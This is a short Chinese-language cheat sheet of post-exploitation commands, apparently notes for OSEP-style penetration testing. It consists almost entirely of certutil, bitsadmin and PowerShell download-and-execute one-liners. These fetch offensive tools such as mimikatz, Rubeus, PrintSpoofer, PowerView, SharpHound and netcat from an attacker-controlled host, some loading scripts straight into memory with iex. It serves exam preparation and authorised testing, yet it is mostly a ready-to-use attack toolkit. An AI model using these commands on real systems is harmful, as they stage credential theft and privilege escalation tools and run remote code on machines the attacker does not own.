#### 工具栏 ``` 把tools全放至osep/self_tools里 certutil -urlcache -split -f http://ipaddress/ps1/Find-WMILocalAdminAccess.ps1 certutil -urlcache -split -f http://ipaddress/ps1/HostRecon.ps1 certutil -urlcache -split -f http://ipaddress/ps1/LAPSToolkit.ps1 certutil -urlcache -split -f http://ipaddress/ps1/PowerUp.ps1 certutil -urlcache -split -f http://ipaddress/ps1/PowerUpSQL.ps1 certutil -urlcache -split -f http://ipaddress/exe/incognito.exe certutil -urlcache -split -f http://ipaddress/exe/nc.exe certutil -urlcache -split -f http://ipaddress/exe/psexec.exe ``` #### 一定会用到的工具 ``` certutil -urlcache -split -f http://ipaddress/mimikatz.exe certutil -urlcache -split -f http://ipaddress/PrintSpoofer.exe certutil -urlcache -split -f http://ipaddress/PsExec64.exe certutil -urlcache -split -f http://ipaddress/Rubeus.exe certutil -urlcache -split -f http://ipaddress/findspn.ps1 certutil -urlcache -split -f http://ipaddress/invoke-hunter.ps1 certutil -urlcache -split -f http://ipaddress/PowerUp.ps1 certutil -urlcache -split -f http://ipaddress/powerview.ps1 certutil -urlcache -split -f http://192.168.49.57:83/SharpHound.exe certutil -urlcache -split -f http://192.168.49.57/SpoolSample.exe ``` ### downloader ``` certutil -urlcache -split -f http://ipaddress/shell.exe bitsadmin /transfer n http://ipaddress/5.exe c:\users\public\a.exe && c:\download\a.exe powershell.exe -ep bypass --command "iex (iwr ipaddress/ipw.ps1 -UseBasicParsing)" ``` ### 一键化 ``` (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:82/PowerView.ps1') | iex (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57:82/powermad.ps1') | iex certutil -urlcache -split -f http://ipaddress/PowerUp.ps1 certutil -urlcache -split -f http://ipaddress/mimikatz.exe certutil -urlcache -split -f http://ipaddress/PsExec64.exe certutil -urlcache -split -f http://ipaddress/Rubeus.exe ``` ## 注意的点 ``` copy \\192.168.49.57\test\hw.txt c:\users\public\x.txt ```